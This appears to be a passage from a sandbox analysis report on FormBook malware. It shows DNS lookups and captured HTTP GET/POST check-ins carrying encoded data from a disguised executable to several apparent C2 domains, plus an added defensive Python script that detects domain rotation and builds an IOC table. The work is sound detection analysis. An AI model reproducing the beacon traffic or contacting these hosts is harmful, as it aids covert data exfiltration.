Jul 4, 2024 12:37:46.690951109 CEST | 1.1.1.1 | 192.168.2.4 | 0xfff9 | No error (0) | enagicwebsystem.com | - | 52.1.217.30 | A (IP address) | IN (0x0001) | false
Jul 4, 2024 12:38:00.712979078 CEST | 1.1.1.1 | 192.168.2.4 | 0xfb54 | No error (0) | www.chefmikesrecipes.com | chefmikesrecipes.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jul 4, 2024 12:38:00.712979078 CEST | 1.1.1.1 | 192.168.2.4 | 0xfb54 | No error (0) | chefmikesrecipes.com | - | 23.226.70.194 | A (IP address) | IN (0x0001) | false
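Read together, the DNS and IDS rows above show what a hunter should key on rather than any single name: in about two minutes one client resolves nine unrelated domains across five TLDs (.com, .lol, .top, .shop, .xyz), sends a GET/POST check-in to each, receives one NXDOMAIN (www.wepayassessments.com), and ignores one answer it was given (15.197.148.33 for alanbeanart.com). FormBook is documented to cycle through an embedded domain list in which most entries are decoys, and the resolutions here are consistent with that: www.enrich-pet.com, for instance, resolves through wixdns.net and answers with an ordinary 301 to HTTPS. The script below is an added example, not part of the Joe Sandbox report; its log entries are constructed from the tables above (CNAME hops collapsed, the retransmitted www.piqia.top query kept once), and the three-minute window and the 5-domain / 3-TLD thresholds are assumptions tuned to this sample, not published signatures.

```python
"""Spot FormBook-style C2 domain rotation in DNS and connection logs.

Added example, not part of the Joe Sandbox report. The log entries are
constructed from the DNS query/answer and IDS alert rows of the report (CNAME
hops collapsed, the retransmitted www.piqia.top query kept once). The window
and thresholds are assumptions tuned to this sample, not published signatures.
"""
from __future__ import annotations

from collections import defaultdict
from datetime import datetime, timedelta

# (timestamp, client, qname, rcode, final A records), constructed from the report
DNS_LOG = [
    ("2024-07-04 12:35:54.950", "192.168.2.4", "www.enrich-pet.com", "NOERROR", ["34.149.87.45"]),
    ("2024-07-04 12:36:10.603", "192.168.2.4", "www.alanbeanart.com", "NOERROR", ["3.33.130.190", "15.197.148.33"]),
    ("2024-07-04 12:36:23.756", "192.168.2.4", "www.qaronvc.lol", "NOERROR", ["116.213.43.190"]),
    ("2024-07-04 12:36:58.132", "192.168.2.4", "www.piqia.top", "NOERROR", ["172.80.82.186"]),
    ("2024-07-04 12:37:12.881", "192.168.2.4", "www.cheapdesklamp.shop", "NOERROR", ["194.195.220.41"]),
    ("2024-07-04 12:37:25.681", "192.168.2.4", "www.tofcomy.xyz", "NOERROR", ["162.0.236.122"]),
    ("2024-07-04 12:37:38.397", "192.168.2.4", "www.wepayassessments.com", "NXDOMAIN", []),
    ("2024-07-04 12:37:46.476", "192.168.2.4", "www.wwfglobal.com", "NOERROR", ["52.1.217.30"]),
    ("2024-07-04 12:38:00.240", "192.168.2.4", "www.chefmikesrecipes.com", "NOERROR", ["23.226.70.194"]),
]

# (client, destination IP) for the HTTP sessions the IDS alerted on, from the report
CONNECTIONS = [
    ("192.168.2.4", ip) for ip in (
        "34.149.87.45", "3.33.130.190", "116.213.43.190", "172.80.82.186",
        "194.195.220.41", "162.0.236.122", "52.1.217.30", "23.226.70.194")
]


def registered_domain(qname: str) -> str:
    """Naive eTLD+1 (last two labels); enough for .com/.lol/.top/.shop/.xyz."""
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])


def rotation_suspects(dns_log, window=timedelta(minutes=3),
                      min_domains=5, min_tlds=3) -> dict[str, set[str]]:
    """Clients that resolve many unrelated registered domains across several TLDs
    inside one sliding window: the shape of an embedded C2 list being walked."""
    by_client = defaultdict(list)
    for ts, client, qname, _, _ in dns_log:
        by_client[client].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f"), qname))
    suspects = {}
    for client, queries in by_client.items():
        queries.sort()
        for i, (start, _) in enumerate(queries):
            names = {q for t, q in queries[i:] if t - start <= window}
            regs = {registered_domain(q) for q in names}
            tlds = {r.rsplit(".", 1)[-1] for r in regs}
            if len(regs) >= min_domains and len(tlds) >= min_tlds:
                suspects.setdefault(client, set()).update(names)
    return suspects


def ioc_table(dns_log, connections) -> dict[str, dict]:
    """Join resolutions with observed connections: which answers were used,
    which were ignored, and which names never resolved at all."""
    contacted = defaultdict(set)
    for client, ip in connections:
        contacted[client].add(ip)
    table = {}
    for _, client, qname, rcode, answers in dns_log:
        table[qname] = {
            "rcode": rcode,
            "contacted": [ip for ip in answers if ip in contacted[client]],
            "ignored": [ip for ip in answers if ip not in contacted[client]],
        }
    return table


if __name__ == "__main__":
    for client, names in rotation_suspects(DNS_LOG).items():
        print(f"{client}: {len(names)} domains in rotation")
    for name, row in ioc_table(DNS_LOG, CONNECTIONS).items():
        print(f"{name:26} {row['rcode']:8} contacted={row['contacted']} ignored={row['ignored']}")
```

The join is what keeps a blocklist honest: every resolved address is worth recording, but only the ones in `contacted` were actually used by the sample, and a name that returned NXDOMAIN is still a useful detection string even though it yields no IP. The rotation check is deliberately per-client and windowed; a single lookup of any of these domains from a user browsing is not a finding.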
                • www.enrich-pet.com
                • www.alanbeanart.com
                • www.qaronvc.lol
                • www.piqia.top
                • www.cheapdesklamp.shop
                • www.tofcomy.xyz
                • www.wwfglobal.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 60619 | 34.149.87.45 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
Timestamp | Bytes transferred | Direction | Data
Jul 4, 2024 12:35:55.019984961 CEST | 491 | OUT | GET /qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRPczT41Pma1tHEzPhIwEcWnI00ZdIodjuVJj7fI0Qa0rGd4Hyi3029DaEicY=&tDVH=AxaL HTTP/1.1
                Host: www.enrich-pet.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Jul 4, 2024 12:35:55.523375034 CEST | 528 | IN | HTTP/1.1 301 Moved Permanently
                Content-Length: 0
                Location: https://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRPczT41Pma1tHEzPhIwEcWnI00ZdIodjuVJj7fI0Qa0rGd4Hyi3029DaEicY=&tDVH=AxaL
                Accept-Ranges: bytes
                Date: Thu, 04 Jul 2024 10:35:55 GMT
                X-Served-By: cache-iad-kcgs7200045-IAD
                X-Cache: MISS
                X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=
                Via: 1.1 google
                glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 60620 | 3.33.130.190 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
Timestamp | Bytes transferred | Direction | Data
Jul 4, 2024 12:36:10.661734104 CEST | 768 | OUT | POST /jdip/ HTTP/1.1
                Host: www.alanbeanart.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.alanbeanart.com
                Connection: close
                Content-Length: 203
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.alanbeanart.com/jdip/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 62 30 79 34 68 63 6a 54 51 4e 42 54 46 50 4c 72 33 63 4b 50 73 48 61 62 78 39 59 52 37 65 38 62 59 30 6b 4d 57 6c 45 43 59 37 34 69 47 65 48 50 4c 31 4a 49 6e 53 2b 36 73 79 56 6c 62 6f 35 58 49 50 57 34 48 54 38 59 61 45 64 42 47 47 54 51 67 77 62 68 6d 44 51 41 30 56 51 42 6f 31 46 70 6b 57 72 64 56 44 4f 49 43 4b 57 58 33 69 45 77 2f 6c 62 6b 6c 74 61 50 34 63 63 52 57 73 67 56 43 6f 45 47 53 33 43 57 48 47 47 32 37 32 73 36 41 55 39 57 38 36 52 71 6b 76 46 36 46 4e 6a 46 64 73 71 37 47 42 32 71 38 6f 2f 42 45 64 76 71 6f 50 35 79 2b 4b 59 34 70 46 52 54 73 61 47 57 4e 77 3d 3d
                Data Ascii: LtQxGF=b0y4hcjTQNBTFPLr3cKPsHabx9YR7e8bY0kMWlECY74iGeHPL1JInS+6syVlbo5XIPW4HT8YaEdBGGTQgwbhmDQA0VQBo1FpkWrdVDOICKWX3iEw/lbkltaP4ccRWsgVCoEGS3CWHGG272s6AU9W86RqkvF6FNjFdsq7GB2q8o/BEdvqoP5y+KY4pFRTsaGWNw==


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                2 | 192.168.2.4 | 60621 | 3.33.130.190 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:36:13.202755928 CEST | 788 | OUT | POST /jdip/ HTTP/1.1
                Host: www.alanbeanart.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.alanbeanart.com
                Connection: close
                Content-Length: 223
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.alanbeanart.com/jdip/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=b0y4hcjTQNBTEu7r172PqnaYsNYR1O8fY0oMWglHYIciG7DPK0JImS+6nSVsYY5eIPaaHRoYaEhBGGjQgjzi3DQetlQDiVFpkWrdVDbjCJmX3T0wtQnn79aM/ccRSsgRCoEwSzCwHDa27386AHkAvaQh7fEsJcDNFpn0ZjuOhsPQM7+w5+YlsK8L0CYnhZ7fW+jH+jgTz/e6xEsjflINs+w=


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                3 | 192.168.2.4 | 60622 | 3.33.130.190 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:36:15.732542992 CEST | 10870 | OUT | POST /jdip/ HTTP/1.1
                Host: www.alanbeanart.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.alanbeanart.com
                Connection: close
                Content-Length: 10303
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.alanbeanart.com/jdip/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                4 | 192.168.2.4 | 60623 | 3.33.130.190 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:36:18.264786005 CEST | 492 | OUT | GET /jdip/?LtQxGF=W2aYirCPXKJiAM+1zI/AgBHM8/N+99M0G00tOgURX8ZkKPjyDhoW8AacjBkWD6QeLNKPcx0xYFVxMGjx+jrAzlAoi3E+4FlvpErxWC7md5KahWwglUqmq9c=&tDVH=AxaL HTTP/1.1
                Host: www.alanbeanart.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Jul 4, 2024 12:36:18.735172033 CEST | 392 | IN | HTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 04 Jul 2024 10:36:18 GMT
                Content-Type: text/html
                Content-Length: 252
                Connection: close
                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?LtQxGF=W2aYirCPXKJiAM+1zI/AgBHM8/N+99M0G00tOgURX8ZkKPjyDhoW8AacjBkWD6QeLNKPcx0xYFVxMGjx+jrAzlAoi3E+4FlvpErxWC7md5KahWwglUqmq9c=&tDVH=AxaL"}</script></head></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                5 | 192.168.2.4 | 60624 | 116.213.43.190 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:36:24.114075899 CEST | 756 | OUT | POST /d8kh/ HTTP/1.1
                Host: www.qaronvc.lol
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.qaronvc.lol
                Connection: close
                Content-Length: 203
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.qaronvc.lol/d8kh/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=OhVM7ashX1PbpVnxzkhgCV4K0pCFYv4CQ9LkwinGr/P2PTkA3jbEc0g/3sHzyq4grN/dt0IULmqA3371W250GzuX9tTz/xu4ZePbKWPC3QRrV48wPeln4PfBL8wdGQ+kQx1/NfGhxs3RfVwy5bi353+mNqNAVKMIpJo1mGyC4FfqoUz+n8TXKAcEanqc5Lz5YA==


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                6 | 192.168.2.4 | 60625 | 116.213.43.190 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:36:26.653593063 CEST | 776 | OUT | POST /d8kh/ HTTP/1.1
                Host: www.qaronvc.lol
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.qaronvc.lol
                Connection: close
                Content-Length: 223
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.qaronvc.lol/d8kh/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=OhVM7ashX1Pbp13xwHJgF14JxpCFSP4OQ93kwnHvrKf2O2YA5HHEd0g/8MH2ta4drNjjt0kULgGA3z/1VBV3HjuVmdT1gBu4ZePbKWro3R1rUJMwN/lkm/fCCcwdCQ/MQx0aNcDMxu/RfXoy4Ki033/MJqMiaI92x5I+gmS1/1Xukyik2NyAYA43Hgjo0IOwDMkRDE6Ayzjj+xxLYlL9H6s=


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                7 | 192.168.2.4 | 60626 | 116.213.43.190 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:36:29.185380936 CEST | 10858 | OUT | POST /d8kh/ HTTP/1.1
                Host: www.qaronvc.lol
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.qaronvc.lol
                Connection: close
                Content-Length: 10303
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.qaronvc.lol/d8kh/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                8 | 192.168.2.4 | 60627 | 116.213.43.190 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:36:31.720571995 CEST | 488 | OUT | GET /d8kh/?LtQxGF=Dj9s4sQnIR+vsDnKwlk6Nlhqw7itdOFaW/ig+XnRtKCOHSdW0TDTG1cm2v2szq88ld3O918FFXWQyjmpenJ9MCf4z9ns+SbMecfFG1uyoV1oJcUCPfEdpdE=&tDVH=AxaL HTTP/1.1
                Host: www.qaronvc.lol
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                9 | 192.168.2.4 | 60628 | 172.80.82.186 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:36:59.253226042 CEST | 750 | OUT | POST /rlze/ HTTP/1.1
                Host: www.piqia.top
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.piqia.top
                Connection: close
                Content-Length: 203
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.piqia.top/rlze/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=XKagfmR9D4IT1jNSYuQQ1FKe1/RJUmhI4td0ircy0zsFHFxKDdFEk/o5RedsPX0ju0Nzb5kZd3ONBi8ePlOzBOwJJLsb6RmnDRUL/7odBfuoFLg/5l6ZXVzOKDLg5g8qwokv+ZEC7ewXJH6iKYYu6FlPH7Ac2v0StP2qmwzbSHtbfyGVod0J51DFN8oaZ0YtJw==


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                10 | 192.168.2.4 | 60629 | 172.80.82.186 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:01.781228065 CEST | 770 | OUT | POST /rlze/ HTTP/1.1
                Host: www.piqia.top
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.piqia.top
                Connection: close
                Content-Length: 223
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.piqia.top/rlze/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=XKagfmR9D4ITkzdSaPQQ0lKZ2/RJdGhM4th0iukc1GEFEgNKRftEqfo5e+cmC31hu0BNb4YZdzeNBjMeISiwO+wLcbsV3xmnDRUL/787BfmoF7Q/7E7PLFzNcTLgzA8uwokZ+bgk7dIXJCeiKJYt01lzJbBC1+lLoPv+pg3bfGhpTUXP5sVer1n2Q7huU3lkS0pKpRJIV7cDZgf+6zDFE1w=
                Jul 4, 2024 12:37:03.692998886 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Content-Type: text/html;charset=UTF-8
                Server: Microsoft-IIS/7.5
                X-Powered-By: PHP/7.4.6
                Date: Thu, 04 Jul 2024 10:37:07 GMT
                Connection: close
                Content-Length: 1611
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>404 Not Found - www.piqia.top</title><style>body {font-size:14px;color:#000;margin:0;padding:0;font-family: "Microsoft Yahei", , Tahoma, "Helvetica Neue,Hiragino Sans GB,Segoe UI", Arial, STHeiti, sans-serif;}.top{background-color:#3366cc;height:30px;line-height:30px;color:#FFF;}A.l:link {color: #6f6f6f}A.u:link {color: green}h1{font-size:22px;}ul{margin:1em;}#menuzafd7c{line-height:26px; border-bottom:1px solid #009;background:#efefef; padding-left:10px;}#menuzafd7c a,#server a{text-decoration:none}.olzafd7c li{line-height:30px;}a{color:#00f;}.copyright{position:absolute;;left:0;top:-500px;}</style></head><body><div class="top"><b>www.piqia.top 404 Error</b></div><div id="menuzafd7c"><a href="//www.piqia.top"> [TRUNCATED]
                Jul 4, 2024 12:37:03.693017006 CEST | 570 | IN | Data Raw: 74 3a 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 3b 22 3e e8 bf 94 e5 9b 9e e4 b8 8a e4 b8 80 e9 a1 b5 3c 2f 61 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 62 6c 6f 63 6b 71 75 6f 74 65 3e 0d 0a 3c 48 31 3e e5 af b9 e4 b8 8d e8 b5 b7 ef bc 8c e6 b2 a1 e6
                Data Ascii: t:history.go(-1);"></a></div><blockquote><H1></H1><ol> <ul type="square" class="olzafd7c"> <li></li> <li>
                Jul 4, 2024 12:37:03.693186998 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Content-Type: text/html;charset=UTF-8
                Server: Microsoft-IIS/7.5
                X-Powered-By: PHP/7.4.6
                Date: Thu, 04 Jul 2024 10:37:07 GMT
                Connection: close
                Content-Length: 1611
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>404 Not Found - www.piqia.top</title><style>body {font-size:14px;color:#000;margin:0;padding:0;font-family: "Microsoft Yahei", , Tahoma, "Helvetica Neue,Hiragino Sans GB,Segoe UI", Arial, STHeiti, sans-serif;}.top{background-color:#3366cc;height:30px;line-height:30px;color:#FFF;}A.l:link {color: #6f6f6f}A.u:link {color: green}h1{font-size:22px;}ul{margin:1em;}#menuzafd7c{line-height:26px; border-bottom:1px solid #009;background:#efefef; padding-left:10px;}#menuzafd7c a,#server a{text-decoration:none}.olzafd7c li{line-height:30px;}a{color:#00f;}.copyright{position:absolute;;left:0;top:-500px;}</style></head><body><div class="top"><b>www.piqia.top 404 Error</b></div><div id="menuzafd7c"><a href="//www.piqia.top"> [TRUNCATED]
                Jul 4, 2024 12:37:03.694255114 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Content-Type: text/html;charset=UTF-8
                Server: Microsoft-IIS/7.5
                X-Powered-By: PHP/7.4.6
                Date: Thu, 04 Jul 2024 10:37:07 GMT
                Connection: close
                Content-Length: 1611
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>404 Not Found - www.piqia.top</title><style>body {font-size:14px;color:#000;margin:0;padding:0;font-family: "Microsoft Yahei", , Tahoma, "Helvetica Neue,Hiragino Sans GB,Segoe UI", Arial, STHeiti, sans-serif;}.top{background-color:#3366cc;height:30px;line-height:30px;color:#FFF;}A.l:link {color: #6f6f6f}A.u:link {color: green}h1{font-size:22px;}ul{margin:1em;}#menuzafd7c{line-height:26px; border-bottom:1px solid #009;background:#efefef; padding-left:10px;}#menuzafd7c a,#server a{text-decoration:none}.olzafd7c li{line-height:30px;}a{color:#00f;}.copyright{position:absolute;;left:0;top:-500px;}</style></head><body><div class="top"><b>www.piqia.top 404 Error</b></div><div id="menuzafd7c"><a href="//www.piqia.top"> [TRUNCATED]


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                11 | 192.168.2.4 | 60630 | 172.80.82.186 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:04.649194002 CEST | 10852 | OUT | POST /rlze/ HTTP/1.1
                Host: www.piqia.top
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.piqia.top
                Connection: close
                Content-Length: 10303
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.piqia.top/rlze/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Ascii: LtQxGF=XKagfmR9D4ITkzdSaPQQ0lKZ2/RJdGhM4th0iukc1GcFES1KD+tEpfo5TeclC305u0ZBb4Uzd1CNBAUeJm2wVuwLDrsU6RmuDRE1/4E7BfmoF4I/y17PY1zOKDLs5g95wosJ+bkS7soXJiuiI/kt2VlLKbBK1+puoPzypjq8fGlpTV2sp9MB8zvSLLxVdFBeW2ZAhCVoFvotRHqzmyHYaheVQtmdbn6NMGAjW8BOplbJvjCDdEJ9/GkiJWZFLqycE17V/c3dnb/B8Aeo8duUiInjgCWBaSYKymFo4usZh9xoVaxpMbxNKuBtXhhN1CdoTIpE3pVFEfUzbzG5+liXh71lVgQtA7A4sMYQ1VV6FDsxkfJ1TYxfXBDGmZajjrj8dgqEFvFnT4QNzqN7ykUf5ULQlRinVoHb5jZ3NHynmWFXu3A8teD2y5GrG8BvCme1eHwECCsblcgYfskQBNHaiZ6hSg3fgloslRt+Kfea56FPD6WqGa0ODjV8nF4ArX6pFj4w2rXLTqdskX1KlwFaAD1l/1K59RfBDu3T3N2IpnrigGy5hXGOfO8lwQyFHmBjPvbTh8Jo0eT76gnGHqwEZq/4nNQwhrynD8xy18bn1xA9mKudQ8OijLaFWUAw5RfiB9z132GQXEbhqvHDHZQbfA9d3uW9+em5iIZtVor+lEmb/SOkljR/LBeL6kx2qL43ads6AkUpodbkruGC3kV3rHoqz0I6q/cNhdb+Wny/twS4Q7HifsNPQjgPZTYX5vj7M33q3oX4xbRUS7ZFtV7gqU4KjkpB9w/UunaLmZ5ZeY27JuNYNS+Q/z9Uc05ftKEMWGMInq2TwHNz6HwnPa9R5HJFO92j50Epf4b2RvoFHpZYD9cn5OYTz5GDgCsqjTKku+Blw9NszIN7zqFXcFQdNlsExf7AKEKbAEiOg/UkzvAT3xii2wb0AMdi2LRsA5Z74q6bHretjR4ZpW+httP3E3alYesO+pETGHWqPOUlWD9KY [TRUNCATED]


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                12 | 192.168.2.4 | 60631 | 172.80.82.186 | 80 | 2032 | C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 4, 2024 12:37:07.168397903 CEST | 486 | OUT | GET /rlze/?LtQxGF=aIyAcRArRtIGvQhfdflYxlfrxIZLeHRFwP1NsuYwxTNgARVeV6obq7xFZv4/a30th0BoYK05fy/0IwAkOE+OBI8+L6UIixinPDwn66JMG/Wbc84G9m2CbnU=&tDVH=AxaL HTTP/1.1
                Host: www.piqia.top
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Jul 4, 2024 12:37:07.874010086 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Content-Type: text/html;charset=UTF-8
                Server: Microsoft-IIS/7.5
                X-Powered-By: PHP/7.4.6
